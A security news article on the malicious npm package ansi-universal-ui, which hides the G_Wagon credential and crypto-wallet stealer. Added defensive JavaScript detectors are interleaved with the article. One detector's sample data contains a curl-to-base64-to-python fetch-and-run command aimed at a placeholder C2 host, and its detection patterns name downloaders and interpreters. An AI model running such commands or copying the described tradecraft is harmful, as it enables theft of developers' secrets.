A highly sophisticated infostealer malware disguised as a legitimate npm UI component library has been targeting developers through the ansi-universal-ui package.
The malware, internally identified as “G_Wagon,” employs multi-stage obfuscation techniques to extract browser credentials, cryptocurrency wallets, cloud authentication keys, and messaging tokens from infected systems.
Despite presenting itself as “a lightweight, modular UI component system for modern web applications,” the package contains zero legitimate UI functionality.
Instead, it delivers a Python-based infostealer that downloads its own runtime environment and executes heavily obfuscated payloads designed to compromise sensitive user data.
Security researchers first detected the malicious package on January 23, 2026, at 08:46 UTC.
Attacker Methodology
Analysis of the package’s version history reveals an unusual level of sophistication and iterative development.
Between January 21 and January 23, the threat actor published 10 versions, each representing incremental improvements to the attack infrastructure.
Early versions contained only placeholder code testing execution chains, while later releases added anti-forensics capabilities, hex-encoded command-and-control URLs, and memory-only payload execution.
In v1.2.0, the threat actor made an interesting change: the npm tar dependency was removed in favour of spawning the system tar command directly.

Version 1.4.0 marked a critical evolution in evasion techniques. Rather than downloading Python payloads to disk where they could be detected by security tools, the malware now fetches base64-encoded code from remote servers, decodes it in memory, and pipes it directly to the Python interpreter via stdin.
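The execution chain just described (an install script spawning the system tar, then fetching base64 content and piping it to the Python interpreter's stdin) leaves a recognisable parent/child pattern in process telemetry even when nothing touches disk. The following is an added example, not code from the article or from the ansi-universal-ui package: a small detector run over constructed process-start records whose field names (pid, ppid, parent, exe, cmd) are assumed for the example and would need mapping onto a real EDR or auditd schema.

```javascript
// Added example (not code from the article or from the ansi-universal-ui package):
// flag the install-time execution chain described above in process-execution
// telemetry. The event records are constructed for this example and loosely
// follow the shape of EDR/auditd process-start events (pid, parent name, exe, cmd).
const SAMPLE_EVENTS = [
  // npm running a lifecycle script is normal on its own
  { pid: 4101, ppid: 4100, parent: 'npm', exe: 'sh', cmd: 'sh -c "node scripts/setup.js"' },
  // the script unpacking a bundled "runtime" with the system tar (the v1.2.0 change)
  { pid: 4102, ppid: 4101, parent: 'node', exe: 'tar', cmd: 'tar -xzf ui-runtime.tgz -C .ui-runtime' },
  // the v1.4.0 pattern: fetch, base64-decode in memory, feed the interpreter via stdin
  { pid: 4103, ppid: 4101, parent: 'node', exe: 'sh', cmd: 'sh -c "curl -s https://c2.example.invalid/p | base64 -d | python3 -"' },
  // unrelated benign activity that must not alert
  { pid: 5200, ppid: 1, parent: 'systemd', exe: 'python3', cmd: 'python3 /usr/bin/unattended-upgrade' },
  { pid: 5300, ppid: 5299, parent: 'bash', exe: 'tar', cmd: 'tar -czf notes-backup.tgz notes' },
];

// Process names under which npm lifecycle scripts (postinstall etc.) run.
const INSTALL_PARENTS = new Set(['npm', 'npx', 'node', 'yarn', 'pnpm']);
// Tools an install script of a UI component library has no business spawning.
const STAGING_TOOLS = /\b(tar|curl|wget|python3?)\b/;
// "base64 -d ... | python3": decoded content handed to the interpreter on stdin,
// so nothing lands on disk for a file scanner to see (-D is the macOS spelling).
const DECODE_TO_STDIN = /base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:\S*\/)?python3?\b/;

function detectInstallChain(events) {
  const alerts = [];
  for (const ev of events) {
    if (INSTALL_PARENTS.has(ev.parent)) {
      // Either the child itself is a staging tool or a shell wrapper invokes one.
      const tool = STAGING_TOOLS.exec(ev.exe) || STAGING_TOOLS.exec(ev.cmd);
      if (tool) {
        alerts.push({ pid: ev.pid, rule: 'install-script-spawns-tool', detail: tool[1] });
      }
    }
    if (DECODE_TO_STDIN.test(ev.cmd)) {
      alerts.push({ pid: ev.pid, rule: 'decoded-payload-to-python-stdin', detail: ev.cmd });
    }
  }
  return alerts;
}

for (const a of detectInstallChain(SAMPLE_EVENTS)) {
  console.log(`pid ${a.pid}: ${a.rule} (${a.detail})`);
}
```

The first rule is deliberately broad (a lifecycle script invoking tar will also fire for some build tooling), so it is a triage signal to be correlated with the package name; the second rule is specific enough to page on, since a base64 decode piped straight into an interpreter has almost no legitimate use in an install hook.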
The package employs a clever self-dependency trick to achieve double execution. By listing itself as a dependency in package.json, the postinstall hook runs twice during installation, increasing the likelihood of successful compromise. Version 1.3.7 added cleanup code to delete the payload after execution:

The threat actor also sanitized log messages to appear legitimate, changing “Setting up Python environment” to “Initializing UI runtime.”
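The self-dependency trick, the system-tar install hook and the hex-encoded C2 URLs are all visible statically, before anything is executed. The following is an added example, not code from the article or from the ansi-universal-ui package: a manifest and source triage that flags a package listing itself as a dependency, lifecycle hooks that reach for an interpreter, downloader or archiver, and hex runs that decode to URLs. The manifest and source line it runs on are constructed for the example (the package name example-ui-kit and the host c2.example.invalid are placeholders, not the real package's values).

```javascript
// Added example (not code from the article or from the ansi-universal-ui package):
// static triage of a package manifest and source for the tradecraft described above.

// Constructed manifest mirroring the pattern (a self-dependency plus a postinstall
// hook that unpacks a "runtime" and starts Python); not the real package's manifest.
const SAMPLE_MANIFEST = {
  name: 'example-ui-kit',
  version: '1.0.0',
  description: 'a lightweight, modular UI component system',
  dependencies: { 'example-ui-kit': '^1.0.0', react: '^18.0.0' },
  scripts: { postinstall: 'tar -xzf ui-runtime.tgz && python3 .ui-runtime/boot.py' },
};

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Commands a UI library's install hook has no legitimate reason to run; a hit is a
// triage signal for a human reviewer, not a verdict (build tooling occasionally uses tar).
const SUSPICIOUS_IN_HOOK = /\b(python3?|curl|wget|tar|base64|powershell|node -e)\b/i;

function auditManifest(pkg) {
  const findings = [];
  const deps = Object.assign({}, pkg.dependencies, pkg.devDependencies, pkg.optionalDependencies);
  // A package that depends on itself gets its install hooks run more than once.
  if (pkg.name && Object.prototype.hasOwnProperty.call(deps, pkg.name)) {
    findings.push(`self-dependency: "${pkg.name}" lists itself, so install hooks run more than once`);
  }
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const m = scripts[hook] && SUSPICIOUS_IN_HOOK.exec(scripts[hook]);
    if (m) findings.push(`${hook} hook runs ${m[1]}: ${scripts[hook]}`);
  }
  return findings;
}

// Hex runs of at least 16 digits that decode to printable ASCII containing a URL
// scheme; this is how hex-encoded C2 addresses show up in obfuscated sources.
function findHexEncodedUrls(source) {
  const urls = [];
  for (const run of source.match(/\b(?:[0-9a-f]{2}){8,}\b/gi) || []) {
    const decoded = Buffer.from(run, 'hex').toString('latin1');
    if (/^[\x20-\x7e]+$/.test(decoded) && /https?:\/\//.test(decoded)) urls.push(decoded);
  }
  return urls;
}

// Constructed source line using the encoding pattern (c2.example.invalid is a placeholder).
const SAMPLE_SOURCE =
  'const endpoint = Buffer.from("' +
  Buffer.from('https://c2.example.invalid/collect').toString('hex') +
  '", "hex").toString();';

console.log(auditManifest(SAMPLE_MANIFEST));
console.log(findHexEncodedUrls(SAMPLE_SOURCE));
```

Run it against the unpacked tarball of a package under review (`npm pack` without installing, then point `auditManifest` at its package.json and `findHexEncodedUrls` at each JavaScript file); the self-dependency check in particular has no false-positive story worth arguing about.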
Data Theft Capabilities
The G_Wagon stealer targets an extensive range of sensitive information. It extracts credentials from Chrome, Edge, and Brave browsers on both Windows and macOS platforms.
On Windows systems, it terminates browser processes and uses Chrome DevTools Protocol to harvest cookies, while decrypting saved passwords through the Windows Data Protection API.
Cryptocurrency wallet theft represents the primary objective. The malware targets over 100 browser wallet extensions including MetaMask, Phantom, Coinbase Wallet, Trust Wallet, Ledger Live, and Exodus.
It copies entire extension data directories for wallets spanning Ethereum, Solana, Cosmos, Polkadot, Cardano, and numerous other blockchain ecosystems.
Cloud credentials pose another significant target. The stealer copies AWS CLI, Azure CLI, and Google Cloud SDK credential files, along with SSH keys and Kubernetes configuration files.
Discord tokens, Telegram data directories, and Steam authentication files also fall within its scope.
Stolen data is compressed and uploaded to Appwrite storage buckets hosted on both NYC and Frankfurt servers. For large files, the malware chunks data into 5 MB pieces to ensure reliable transmission.
The code even includes an embedded Windows DLL that gets injected into browser processes using NT native APIs for deeper system access.
Affected users should immediately remove ansi-universal-ui, rotate all browser-saved passwords, revoke cryptocurrency wallet credentials, regenerate cloud service keys, and invalidate messaging application sessions.